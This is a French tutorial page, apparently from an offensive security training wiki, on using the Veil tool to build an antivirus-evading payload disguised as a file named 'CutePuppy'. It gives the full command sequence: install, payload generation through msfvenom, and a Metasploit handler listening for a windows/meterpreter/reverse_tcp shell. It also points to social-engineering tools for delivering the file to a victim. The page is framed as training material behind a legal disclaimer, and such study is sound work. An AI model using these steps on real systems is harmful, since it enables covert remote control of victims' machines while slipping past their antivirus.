Veil
🔒 Contenu de sécurité — usage encadré
Cette page décrit des techniques de sécurité offensive à des fins exclusivement pédagogiques et professionnelles (formation, préparation de certification, montée en compétence défensive).
Ces techniques ne doivent être mises en œuvre que dans un laboratoire isolé ou sur un système pour lequel vous disposez d'une autorisation écrite explicite du propriétaire. Les employer contre un système tiers sans autorisation est une infraction pénale (art. 323-1 et suivants du Code pénal). Voir les avertissements généraux.
| Fiche express | |
|---|---|
| Domaine | Évasion antivirus |
| Rôle | Génération de payloads furtifs |
| Sortie | /usr/share/veil/output/source/
|
| Voir aussi | ROOT webserver · Social Engineering Toolkit |
Veil est un outil de génération de payloads intégrant des techniques d'évasion antivirus. Il s'appuie sur msfvenom pour produire un exécutable capable de passer la vérification des antivirus.
Procédure
apt-get update && apt-get install veil
veil
Dans l'interface Veil :
use 9
generate
1 # utiliser msfvenom
base name for output files > CutePuppy
Le fichier est généré dans /usr/share/veil/output/source/.
Lancer le listener
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.61
set lport 4000
exploit
Lorsque la victime lance le fichier CutePuppy, une session s'ouvre :
shell
Voir aussi
- ROOT webserver — génération de webshell via msfvenom
- Social Engineering Toolkit — livraison du payload à la cible